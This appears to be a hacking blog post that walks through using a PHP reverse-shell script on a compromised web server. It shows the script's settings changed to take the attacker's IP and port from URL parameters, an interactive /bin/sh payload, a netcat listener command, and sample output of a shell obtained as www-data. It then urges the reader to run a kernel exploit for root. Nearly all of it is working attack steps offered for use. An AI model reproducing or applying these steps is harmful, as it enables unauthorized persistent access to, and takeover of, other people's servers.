If you are attacking a website and successfully compromised, you have to connect back from the web server machine to your local machine for future Attack. I have one simple php script to do that, only enter your ip address and your port on the URL to connect back. for example :
http://192.168.56.101/rs.php?ip=192.168.56.1&port=1234
At the ip 192.168.56.101 is the target ip, the script called rs.php and then variables ip and port are from your local machine.
the script is below :
At the original script ask you to change the variables ip and port
Script before change
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = '1234'; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
the script after changed :
$VERSION = "1.0";
$ip = $_GET['ip']; // CHANGED
$port = $_GET['port']; // CHANGED
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
you can download the full script Here >>
next..
after changed, open your terminal on your local machine and use net cat to listening. example :
root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
This will be open listening on port 1234.
go to your browser run the script on the target web server with enter your ip address and port destination
if connected you will be have an message like "connection successfully".
look to your terminal an then you will meet like this :
root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37140
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
20:47:47 up 2:12, 6 users, load average: 0.09, 0.07, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 18:36 2:11m 0.11s 0.00s /bin/bash /usr/
root pts/0 :0 18:36 2:11m 0.00s 1.64s kdeinit4: kded4
root pts/2 :0.0 18:37 2:10m 4.28s 4.23s wvdial smart
root pts/3 :0.0 18:38 1:10m 1.03s 1.02s elinks
root pts/1 :0.0 20:32 15:13 0.01s 0.01s /bin/bash
root pts/6 :0.0 20:41 13.00s 0.03s 0.00s nc -l -n -v -p
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: no job control in this shell
sh-4.1$
run your exploit to get root access..
for more information about kernel exploit read my older post get-root-access-on-server
visit Exploit-db for more exploit..
thanks for reader... :D
Tidak ada komentar:
Posting Komentar